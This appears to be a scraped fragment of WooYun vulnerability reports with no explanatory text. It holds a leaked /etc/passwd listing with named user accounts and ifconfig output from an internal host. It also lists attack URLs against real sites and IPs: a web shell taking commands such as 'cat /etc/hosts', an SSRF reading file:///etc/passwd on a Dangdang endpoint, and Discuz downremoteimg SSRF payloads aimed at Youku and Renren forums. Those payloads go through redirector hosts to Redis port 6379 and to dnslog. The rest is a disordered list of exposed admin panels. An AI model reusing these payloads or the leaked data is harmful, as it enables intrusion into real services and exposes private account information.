uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin named:x:25:25:Named:/var/named:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin cimsrvr:x:134:134:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:497:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin tss:x:59:59:Account daemon:/dev/null:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin ricci:x:140:140:ricci user:/var/lib/ricci:/sbin/nologin tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash pulse:x:495:492:PulseAudio Daemon:/var/run/pulse:/sbin/nologin stap-server:x:155:155:Systemtap Server:/var/lib/stap-server:/sbin/nologin xguest:x:500:500:Guest:/home/xguest:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin quagga:x:92:92:Quagga suite:/var/run/quagga:/sbin/nologin webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin luci:x:141:141:luci application:/var/lib/luci:/sbin/nologin ident:x:98:98::/:/sbin/nologin uuidd:x:494:488:UUID daemon:/var/lib/libuuid:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin squid:x:23:23::/var/spool/squid:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin yuanming:x:501:501::/home/yuanming:/bin/bash haibo:x:502:502::/home/haibo:/bin/bash gaozhi:x:503:503::/home/gaozhi:/bin/bash hanjian:x:504:504::/home/hanjian:/bin/bash liuxin:x:505:505::/home/liuxin:/bin/bash yiqian:x:506:506::/home/yiqian:/bin/bash yifeng:x:507:507::/home/yifeng:/bin/bash www:x:508:508::/home/www:/bin/bash couchbase:x:493:486:couchbase user:/opt/couchbase:/bin/sh nginx:x:492:485:Nginx server:/var/lib/nginx:/sbin/nologin td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin yongrong:x:509:509::/home/yongrong:/bin/bash baoku:x:510:10::/home/baoku:/bin/bash yuwenlong:x:511:511::/home/yuwenlong:/bin/bash jizheng:x:512:10::/home/jizheng:/bin/bash zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash http://wooyun.org/bugs/wooyun-2016-0224381 http://183.136.160.212:8161/ http://183.136.160.212:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts http://183.136.160.212:8161/admin/test/sex.jsp?pwd=023&cmd=arp%20-a http://wooyun.org/bugs/wooyun-2016-0222995 http://www.bbktel.com.cn/ www.bbktel.com.cn http://61.155.152.126:9999 https://github.com/yqbaa/mmm/blob/553aeb33860152b3f46f8ace53660617b03e8cd9/configs/smtpConfig.php http://lib.gzhmu.edu.cn/oldweb/pp.rar http://lib.gzhmu.edu.cn/gctj/index.asp http://v.6.cn/coop/mobile/index.php?padapi=coop-mobile-inroom.php&ruid=【主播uid】&playeruid=&encpass= https://mail.jiayuan.com http://**.**.**.**/datau/cmcc/ http://www.aoyou.com/ http://cyts.chinaopenschool.com/customize/nwc_user_newvexam/login/login.html Host:cyts.chinaopenschool.com http://yun.1905.com/index.php?m=Home&c=User&a=findPassword http://mail.hsbank.com.cn https://github.com/aoliang/demo/blob/4fe5c8b2f38ce9b3e75974bd72593690a117ffd5/src/main/java/com/github/mail/SendMail.java http://jpkc.wzu.edu.cn/xhyxt/col_tsjx/detail.aspx?tid=25&ID=751 http://yun.1905.com http://yun.1905.com/index.php?m=Home&c=User&a=findPassword http://yun.1905.com/admin.php时发现Duang的一下跳到了后台! http://yun.1905.com/admin.php?s=/Public/login http://www.kibey.com http://**.**.**/ http://**.**.**/manage http://123.56.246.2:10001/login.action http://123.56.246.2:8083 http://139.196.105.162:8081/ http://180.167.72.216:88/login/Login.jsp http://180.167.72.216:88//services/MobileService?wsdl http://123.59.138.141/ http://drops.wooyun.org/papers/15892 http://prepare.chinaexpressair.com/admin/login.aspx https://service.hxzq.cn/servlet/sso/Manage?function=ForwardConfirmMobileSetp1 http://caipiao.dangdang.com/api/get.php?cache_lifetime=30&call_time=1467988328&method=header&source=a8d620b2bb6cce75bd6d7db53c1486e2&url=file:///etc/passwd http://caipiao.dangdang.com/api/get.php?cache_lifetime=30&call_time=1467988328&method=header&source=a8d620b2bb6cce75bd6d7db53c1486e2&url=http://192.168.1.203 http://bbs.yj.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg[/img http://club.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img http://bbs.youkutv.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img http://bbs.share.youku.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img http://bbs.wan.youku.com//forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=80%26data=helo.jpg[/img http://caipiao.dangdang.com/cbportal/usercenter/hemai.htm encap:Ethernet B1:1C:4C:A9:F2 addr:192.168.1.203 Bcast:192.168.1.255 Mask:255.255.255.0 fe4c:a9f2/64 Scope:Link MTU:1500 packets:3425084210 frame:4604 packets:2920393573 txqueuelen:1000 http://learn.open.com.cn/登入 http://oemsresource.open.com.cn/Attachment/ExportTemp/OEMS/PictureTemp/20160711/ http://shop.cib.com.cn//?m=product&s=detail&id=457 http://s.51.com/ http://i.lianle.com/Account/register http://wooyun.org/bugs/wooyun-2010-0215779 http://war.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img http://kd.gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren4.22e642.dnslog.info/?data=helo.jpg[/img http://fans.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img http://gamebbs.renren.com/forum.php?mod=ajax&action=downremoteimg&message=[img]http://localhost-9200.com/302.php?url=http://renren.22e642.dnslog.info/?data=helo.jpg[/img http://www.msol.cc:8080/user_goRegisterPage.action http://www.jin.12306.cn/Dzsw/Shky/hwky.wai/trackorder.action http://zhnx.ynrcc.com/index http://112.112.13.35:8080/admin/login http://st.so.com http://st.so.com/stu https://github.com/lz958942/tuanche-old/blob/d19773659fdd3796be14cf7849a7a99bf69bed9d/adminweb/cms/tags/testCms/src/main/resources/application.properties http://210.21.61.132:8001/wisdomServer/wisdomClient/main.html